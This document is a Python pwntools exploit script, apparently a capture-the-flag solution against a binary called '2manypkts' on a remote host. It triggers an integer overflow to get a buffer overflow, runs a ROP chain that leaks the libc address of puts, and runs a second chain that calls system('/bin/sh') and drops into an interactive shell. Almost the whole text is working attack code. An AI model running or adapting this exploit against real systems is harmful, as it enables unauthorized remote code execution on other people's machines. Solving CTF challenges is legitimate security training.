#!/usr/bin/env python3

import socket
import subprocess
import time
import random

from pwn import *

BUFFER_SIZE = 14336

context.log_level = 'debug'

def attach_gdb():
    import os
    import signal
    import pipes
    gdb_commands = [
        "tcatch exec",
        "handle SIGSTOP nostop",
        "continue",
        "handle SIGSTOP stop",
        #"b realloc",
        #"b * 0x400E92",
        "continue",
    ]
    cmds = " ".join("-ex %s" % pipes.quote(c) for c in gdb_commands)
    #os.system("tmux split-window -h %s" % pipes.quote("gdb -p %d %s" % (os.getpid(), cmds)))
    os.system("urxvtc -e gdb -p %d %s" % (os.getpid(), cmds))
    os.kill(os.getpid(), signal.SIGSTOP)

LOCAL = 0

if LOCAL:
    libc = ELF("/lib64/libc.so.6")
    #p = process("./2manypkts", preexec_fn=attach_gdb)
    p = process("./2manypkts")
else:

    host = "203.0.113.1"
    port = 30303
    libc = ELF("./libc.so.6")

    p = process(["/home/wgh/go/bin/tun_tcp_connect", "lol0", "10.1.1.2", str(random.randint(20000, 0xFFFF)), host, str(port)], stderr=None)
    #p = remote(host, str(port))

bin_sh_offset = next(libc.search("/bin/sh\0"))

# double-sized (8 bytes)
EXTRA_ELEMENTS = 1

def compute_overflow_size(size, type_size):
    INT_MIN = -(2**31)
    return INT_MIN + size/type_size

def get_rop_chain1():
    p = b""
    p += p64(0x0000000000403663) # pop rdi, ret
    p += p64(0x605048) # arg1: GOT entry for puts
    p += p64(0x400C10) # f: puts
    p += p64(0x400E36) # main
    return p

def get_rop_chain2(base):
    p = b""
    p += p64(0x0000000000403663) # pop rdi, ret
    p += p64(base + bin_sh_offset) # arg1: '/bin/sh'
    p += p64(base + libc.symbols[b'system']) # f: system
    p += p64(0x400E36) # main (is not actually needed)
    return p

chain1 = get_rop_chain1()

time.sleep(1)

p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain1), 4))
p.recvuntil("size :")
if getattr(p, "sock", None):
    p.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, True)
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain1)
if getattr(p, "sock", None):
    p.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, False)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")

leaked_puts = u64(p.recv(6) + b'\0\0')
libc_base = leaked_puts - libc.symbols[b'puts']

log.info("Leaked puts: %016x", leaked_puts)
log.info("Libc base: %016x", libc_base)

chain2 = get_rop_chain2(libc_base)

p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain2), 4))
p.recvuntil("size :")
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain2)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")

p.interactive()